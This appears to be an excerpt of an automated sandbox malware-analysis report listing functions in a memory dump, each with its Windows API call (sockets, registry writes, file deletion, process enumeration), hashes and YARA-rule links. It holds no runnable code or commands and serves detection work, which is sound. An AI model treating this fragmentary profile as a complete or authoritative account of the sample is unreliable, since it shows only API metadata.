Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 48d6d17fdf8e27187a3b90044b0532bca0d75dd2d53a45a79cdef9a4d9b672e6
Instruction ID: 9a245957b53c65460c93f9992b54674ac1df0999c884d8be4e1bba9df4cd894b
Opcode Fuzzy Hash: 48d6d17fdf8e27187a3b90044b0532bca0d75dd2d53a45a79cdef9a4d9b672e6
Instruction Fuzzy Hash: 5021D37250D3C06FD313CB218C55B66BFB4EF87610F0980CBD8858F2A3D224A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 052E2D5D, Relevance: 1.6, APIs: 1, Instructions: 80networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E2DF2

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: edf563410a196eed17890e722f34fc40948c175f621a750d046f841649eedaf2
Instruction ID: 8a7504d7ac88a2010bd5cb25d9865c511f19fba49b9418f8d587699f3a3e9182
Opcode Fuzzy Hash: edf563410a196eed17890e722f34fc40948c175f621a750d046f841649eedaf2
Instruction Fuzzy Hash: F8219272404344AFEB228F51DC44FA7BBACEF45710F0889AAE9859B152D374A519CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E0EDE, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E2C), ref: 052E0F5B

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e3404cc75fae7da895816008959fdae20860467bdfce0f21fb2a8b4c82e285ff
Instruction ID: e2c128aae6dfad4416651ceb90cb89eda13a9a43c8b51c4688472ffb18c76e24
Opcode Fuzzy Hash: e3404cc75fae7da895816008959fdae20860467bdfce0f21fb2a8b4c82e285ff
Instruction Fuzzy Hash: 0321E072500305AFEB21DF65DC44F6BFBACEF44710F04896AED458B151D770A919CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E02AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 052E0353

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 638d69c89c2167ea7cc1a5e70dfa2a73cac08adc939dce937f79f643e382237b
Instruction ID: 6676a133a5754580f84de340b97f971676c5dfd2445e780ea4b50c958183747e
Opcode Fuzzy Hash: 638d69c89c2167ea7cc1a5e70dfa2a73cac08adc939dce937f79f643e382237b
Instruction Fuzzy Hash: E721A371409380AFE7228B21DC45FA6BFB8EF46710F1884DAE9858B192D375A919CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E21D2, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 052E225D

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: c22ef294670045df50b039ee2d2b627be7d0ad0d8a7fd86e924c6d15c80011f7
Instruction ID: b792aaad26cb3f45e66ed9850a2ddae4b0e106f828ac9f1bef7f1eda728e3e26
Opcode Fuzzy Hash: c22ef294670045df50b039ee2d2b627be7d0ad0d8a7fd86e924c6d15c80011f7
Instruction Fuzzy Hash: E021A1B1509380AFE721CF25CC45F66FFA8EF45610F18849EE9898B292D375A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E1A72, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 052E1AFE

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: aa5579046471e6e3ad57a1dc6a541dfec359effd37a9d8b97bba328373e68b2f
Instruction ID: 10b728561541f32946bf4817b77ce2540604971e0f866209263d3b2a07f53d49
Opcode Fuzzy Hash: aa5579046471e6e3ad57a1dc6a541dfec359effd37a9d8b97bba328373e68b2f
Instruction Fuzzy Hash: 3421F171408380AFE722CF21CC48F66FFF8EF45210F0884AEE9858B652D375A808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E2E56, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E2EE6

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: 965f957f8cf8a5fee11965963397d994071db00c70a9f6279efc0643e0106639
Instruction ID: 0b2f22fbea52344bb5f9e60a24fee832d8106270c44e98dc6a96ebf30e415cf6
Opcode Fuzzy Hash: 965f957f8cf8a5fee11965963397d994071db00c70a9f6279efc0643e0106639
Instruction Fuzzy Hash: 4121AE72404344AFEB228F51DC44FABBBBCEF45610F04899AEA899B152D334A518CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 052E08F0, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E0985

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 4166fde617ad433f3b3f6b16583a60e002ff20ddf5df25c8662c70595393d6a7
Instruction ID: 7215be63b18301dab385886884740aca8cc790f5c6e9a6944dca8756aa788cb6
Opcode Fuzzy Hash: 4166fde617ad433f3b3f6b16583a60e002ff20ddf5df25c8662c70595393d6a7
Instruction Fuzzy Hash: 9A2128B64087806FF7128B259C44FB6BFB8EF46B20F1880DAED848B153D364A905C771

Uniqueness

Uniqueness Score: -1.00%

Function 012CAF50, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 012CAFEA

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d0ad69dde8798da1e0efb214cc65cc4160943130941dde21cfd4ba7d2c46f084
Instruction ID: 9ad02ce08250827067c339a94c026b7c1ffe71d6f92ca31a68c97d9c51f5002c
Opcode Fuzzy Hash: d0ad69dde8798da1e0efb214cc65cc4160943130941dde21cfd4ba7d2c46f084
Instruction Fuzzy Hash: C421C5715093C06FD3138B259C51B62BFB8EF87A10F0A41DBEC84CB653D224A91AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 052E081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 052E0899

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0f8fb8116efb335bdd99c11ac86f58c347608df0865c3aa06a26403d1c3151f4
Instruction ID: 721f39b1aa1d6f217bbe08be4e80b55304085299243e9fc36d9eb1d72fb516f6
Opcode Fuzzy Hash: 0f8fb8116efb335bdd99c11ac86f58c347608df0865c3aa06a26403d1c3151f4
Instruction Fuzzy Hash: F1217C71504700AFE721DF65CC48B6AFBE8FF04610F148469E9898B652D3B1E805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 052E0B79, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E0C10

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 085d730b7c28ee2572aea1079fa0df61e2e91428b9be3351cfc65918d8ed363f
Instruction ID: 9b86fd21dd8973f32b964f8f5ea051a7906b751b9faed89df062ca3aca345dac
Opcode Fuzzy Hash: 085d730b7c28ee2572aea1079fa0df61e2e91428b9be3351cfc65918d8ed363f
Instruction Fuzzy Hash: 8F21AFB2508744AFE7218F11DC85F67FBF8EF45710F08859AE9899B292D364E809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E03CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 052E045E

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a93b1f55b1b7c3a03d6fc76961590f2d16c0be6e15be328417adf035047c2f47
Instruction ID: 9ea6ac21198f7426ee4290d1a67ae062afa35cf0346dfa195b9f79e452a70cab
Opcode Fuzzy Hash: a93b1f55b1b7c3a03d6fc76961590f2d16c0be6e15be328417adf035047c2f47
Instruction Fuzzy Hash: 8421B071500304AFFB31DF11DD45FBAFBA8EF04710F14895AEA868A181D7B1A94ACBB1

Uniqueness

Uniqueness Score: -1.00%

Function 052E09C0, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E0A51

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 95104d9c1b8f6ec2947cd3b7ef3c07f3a58ba590dd6fafd42ca40ff929c4af1c
Instruction ID: 30fbcc405e81cd578ff4e2d5efeac7903297219c53aceb58c92213e34c3e60ce
Opcode Fuzzy Hash: 95104d9c1b8f6ec2947cd3b7ef3c07f3a58ba590dd6fafd42ca40ff929c4af1c
Instruction Fuzzy Hash: F5219072409384AFE7228F21DC44F66BFB8EF46614F0884DBE9858B153C374A919CB72

Uniqueness

Uniqueness Score: -1.00%

Function 012CAA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 012CAAB1

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ee4b283089b4e5fe16d9f0dd7a6576991409b9e9a0302ac593d1232e7da5745d
Instruction ID: 990625aa0f4877054878825fc75d3d64107d171a5f31dce7bffa0649c074cb3d
Opcode Fuzzy Hash: ee4b283089b4e5fe16d9f0dd7a6576991409b9e9a0302ac593d1232e7da5745d
Instruction Fuzzy Hash: 6321CF72500704AFE7219A19CD85F6BFBECEF44B10F04855AEE418B241E760E808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E2B72, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E2BF9

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: cea322a6864ec8e1ad4af2a2200994eb609e1cb289772a5883139be76178f027
Instruction ID: bba1216a5ce0f38363a366dcd7954706ce41ee02154c204b45e81200f7b5e91e
Opcode Fuzzy Hash: cea322a6864ec8e1ad4af2a2200994eb609e1cb289772a5883139be76178f027
Instruction Fuzzy Hash: 2F21AF72505384AFE722CF11DD44FABBFBCEF45610F0884AAE9899B152D364A948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 052E019D

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 99211656373615bacbe6c0aa9c00a0acc89de80336c33941103272061dacf56a
Instruction ID: fea8a195b02cc06991bbb91eec01a5d4c81a5215e3293fd5878f0bd05c92fd50
Opcode Fuzzy Hash: 99211656373615bacbe6c0aa9c00a0acc89de80336c33941103272061dacf56a
Instruction Fuzzy Hash: 1A218E71504240AFE720DF25DC89B6AFBE8EF44610F1484AAED498F641D3B5E905CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E0723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 052E079F

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 4b382d01f77e3b2edce8abae2701d9ab55cab51fec408af89bbf9015c161efed
Instruction ID: 3f48ea02baa79c3b89436ce29bed06860395523857d34d3004d08ff6688892f7
Opcode Fuzzy Hash: 4b382d01f77e3b2edce8abae2701d9ab55cab51fec408af89bbf9015c161efed
Instruction Fuzzy Hash: B42183715093819FD712CB25DC48B66BFE8EF46214F0984EAE949CF153E274D909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E10BF, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E2C), ref: 052E114B

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 90bac883bca0131dfd004338f174bf86e137072d3d76df96996476c74480bb49
Instruction ID: f94bf37cd9e39d9acb8da1a4bd0e38a5cad67479a195975d7bf0719f528a2e7a
Opcode Fuzzy Hash: 90bac883bca0131dfd004338f174bf86e137072d3d76df96996476c74480bb49
Instruction Fuzzy Hash: 7D21D571505381AFE721CB25DC45FA6BFA8EF45720F1880AEFD458F192D3B4A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E0A9B, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 052E0B1E

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: f7bcd1a7d8b032dc003703e1bf21e197df47a16bae830dfd1cab8bb250ecc389
Instruction ID: 520d29fb7945017d8d60238947183f3a54a79f9dc558f928b7b5582746950ed9
Opcode Fuzzy Hash: f7bcd1a7d8b032dc003703e1bf21e197df47a16bae830dfd1cab8bb250ecc389
Instruction Fuzzy Hash: C72180B15093859FD722CF29DC55B62BFA8AF56314F0880EAED89CB253D264D809C761

Uniqueness

Uniqueness Score: -1.00%

Function 012CAB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 012CABB4

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9984fb67a38a49d00e2c986a08600b35dab5bbb90c79604abd23854a7b93f6f8
Instruction ID: b1d0407ad2aa050d71640dc26901478efeb89df44d16fbaaf20fa3a996ce6c32
Opcode Fuzzy Hash: 9984fb67a38a49d00e2c986a08600b35dab5bbb90c79604abd23854a7b93f6f8
Instruction Fuzzy Hash: B5214F75500608AFE721CE15DC45F66FBECEF54A10F14859AEA458B251E760E844CA71

Uniqueness

Uniqueness Score: -1.00%

Function 052E1530, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 052E159C

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 23d03613e5978369c8555562aa4c3e5d93b5013bfa924d6f650f0db527758a17
Instruction ID: 854c60c6d8cdda4e78493097d2af16909a0e9ac4c7f8af9607b991dfa5462afd
Opcode Fuzzy Hash: 23d03613e5978369c8555562aa4c3e5d93b5013bfa924d6f650f0db527758a17
Instruction Fuzzy Hash: 6A21C0725093C45FDB138F25DC54B92BFB4AF47224F0980EAED858F663D274A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 052E21F2, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 052E225D

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 4380df004a4188567021c56b3580eca32aa6f74c26f4b6f19f30ea4e3ed456f1
Instruction ID: 19603403a9c269eaa51530a1f984faec7de2e7d00f34dbf7326520d3588c07e8
Opcode Fuzzy Hash: 4380df004a4188567021c56b3580eca32aa6f74c26f4b6f19f30ea4e3ed456f1
Instruction Fuzzy Hash: D921ACB1504200AFFB21DF25CC85F6AFBA8EF44720F1484AAED4A8B641D375A805CB72

Uniqueness

Uniqueness Score: -1.00%

Function 052E2D82, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E2DF2

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: ec4b8769dc8e82588b2e982331391126dfc61d19effa4ecef41c945c2ebe4c85
Instruction ID: af64ec6146376e832e540fde10a5b04ebe7f2eca5236d0095eebbf6734f52b9e
Opcode Fuzzy Hash: ec4b8769dc8e82588b2e982331391126dfc61d19effa4ecef41c945c2ebe4c85
Instruction Fuzzy Hash: 5A11A272400704AFEB21CF51DC44FABFBACEF48710F04856AEA469B151D374A415CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 052E1A92, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 052E1AFE

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: f09cdc0155d3d4fff9968c6d25b94c7c6aa7603c89ff575b9c276851f33d3714
Instruction ID: 3fdb02649f02d937e0901ed39cd3c32a7f0ae9995e81920075db47b683a522f7
Opcode Fuzzy Hash: f09cdc0155d3d4fff9968c6d25b94c7c6aa7603c89ff575b9c276851f33d3714
Instruction Fuzzy Hash: 6821CD71500200AFEB21DF65DC45F66FBA8EF48710F1485AEEA858B651D3B5A814CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E15E5, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,7DB54636,00000000,?,?,?,?,?,?,?,?,72FE3C38), ref: 052E1656

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 70918b71d33a90642d7b215b94185927516ad870dc1157c1e631778d0fb4a260
Instruction ID: 09935161255ac186766b39581b9c4362fcaa72a0e07624d02cd64e00477b61af
Opcode Fuzzy Hash: 70918b71d33a90642d7b215b94185927516ad870dc1157c1e631778d0fb4a260
Instruction Fuzzy Hash: 7E2162715093849FD712CF25DC45BA6BFF8EF06210F0984EAE989CF163D274A918CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E22F2, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 052E2366

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: b9324a225b0381181c674ae9fc7db0135c2f3bdf54cc058ded1fb65016402d12
Instruction ID: f09abf4fa938e3ccb60bd1bb9d66d1fd5cd755fc2eb30372e270baf1365789a8
Opcode Fuzzy Hash: b9324a225b0381181c674ae9fc7db0135c2f3bdf54cc058ded1fb65016402d12
Instruction Fuzzy Hash: 9821AE71500204EFEB21CF15CC45F6AFBE8FF08720F14855EE98A8B641D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E0B9E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E0C10

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: cc07cfdab78f1ca6782638249fc1813a1c7c47428898e40d20fed51245893f1d
Instruction ID: 256e327dd15b5033d7834bfb3050392ae07c0ed341bab64e9ce3ac8333845e5e
Opcode Fuzzy Hash: cc07cfdab78f1ca6782638249fc1813a1c7c47428898e40d20fed51245893f1d
Instruction Fuzzy Hash: 9711BE72900704AFEB21DE15CC85F6BFBE8EF44B10F04849AED4A9B241D3B0E806CA71

Uniqueness

Uniqueness Score: -1.00%

Function 052E04EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E055C

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b3299f6b03cdeeb3d0e1126378f6972efb084287987f064dd936d3dc87f3e2d7
Instruction ID: ee0e1876feb86af216412ca000971db6170c4e1573046861e11739182cc76a60
Opcode Fuzzy Hash: b3299f6b03cdeeb3d0e1126378f6972efb084287987f064dd936d3dc87f3e2d7
Instruction Fuzzy Hash: 9C117F71500704AFEB21CE15DC84F67FBE8FF44B10F0485AAE94A8B251D3A4E446CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E275E, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E27BD

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: ea1db1eed7f13dd4296cb21d1f0689831aabc05280ef9f2645e34c5ddd337c44
Instruction ID: 77083dbd0ccea0bace4b82c57ff3b20fec597350635185b782b96d8dedc83082
Opcode Fuzzy Hash: ea1db1eed7f13dd4296cb21d1f0689831aabc05280ef9f2645e34c5ddd337c44
Instruction Fuzzy Hash: 82119072500600EFEB21CF55DC45F6AFBA8EF44B20F1485AAEE4A8B251D374A854CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E2B92, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E2BF9

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 61ae7723e30c47d921356c8a2b883277790884ed091274c48c22d4d460377fb5
Instruction ID: 9390f3e79f092b50f85dc49a0029aecf51e7a4640c8b3d5f4d53bd3a762911a4
Opcode Fuzzy Hash: 61ae7723e30c47d921356c8a2b883277790884ed091274c48c22d4d460377fb5
Instruction Fuzzy Hash: B911AC76500204AFEB21CF15DD84FAABBACEF44B10F0484AAED4A9B251D374A849CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E12F8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 052E1362

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7c7b979db27c4df7f90d89b5e32a6a2b7c309e905b393c955b0f6fb2babafe9c
Instruction ID: d51c87eacc03941d32216b28656d54e4e5ebc9fcc7f66c6967a663fd298e77d8
Opcode Fuzzy Hash: 7c7b979db27c4df7f90d89b5e32a6a2b7c309e905b393c955b0f6fb2babafe9c
Instruction Fuzzy Hash: 70117F729093819FD725CF25DC85B66BFE8EF45210F0884AAED89CB652D334E818CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012CA51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CA58A

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 606536ea65f42cb1e73c07a9269fc4c32fa0025c59eeb6073adf887ba89bcb9d
Instruction ID: 19f77caebf0b931f16cd517324e41ab3f2971b811d4a2e4a32cc1dad07f81bf9
Opcode Fuzzy Hash: 606536ea65f42cb1e73c07a9269fc4c32fa0025c59eeb6073adf887ba89bcb9d
Instruction Fuzzy Hash: 8D11A271409384AFDB228F54DC44A62FFF4EF4A610F0885DEEE858B163D335A418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 012CB7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 012CB841

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6622ee80d1fb3ee0d46503b9b513abbeb6d4fd92fd3b701d3722a0ec1201d0ad
Instruction ID: 93491c454b687fa4d7406213ad8a92140d2eb3ae1ac7ba9c7155912d18ac2e75
Opcode Fuzzy Hash: 6622ee80d1fb3ee0d46503b9b513abbeb6d4fd92fd3b701d3722a0ec1201d0ad
Instruction Fuzzy Hash: 7C21C0714093C09FDB238B25DC51AA2BFB0EF07210F0D85CAEEC44F163D265A958CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E1006, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E105C

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: deb8d1412d74d6cb6d755bd8cf6e91983956c2d72d060076b467e5e925a8031e
Instruction ID: e024f4b4197a55047ed5fb653d5d9d5fe749394a21b0fd1632e1606ed8945ddc
Opcode Fuzzy Hash: deb8d1412d74d6cb6d755bd8cf6e91983956c2d72d060076b467e5e925a8031e
Instruction Fuzzy Hash: C811A371500245AFEB21DF25DC85FBABB98EF84720F1484AAED49CB281D774A854CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E10E2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E2C), ref: 052E114B

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6363b56f82327e6cf42148b0d3ca4d6a0a0d1f153b2dcfd7d695dcac73f96104
Instruction ID: bca885c356a769486f163c162baccb9a166a739de68d42a9a6a5d97c7d7ae2a5
Opcode Fuzzy Hash: 6363b56f82327e6cf42148b0d3ca4d6a0a0d1f153b2dcfd7d695dcac73f96104
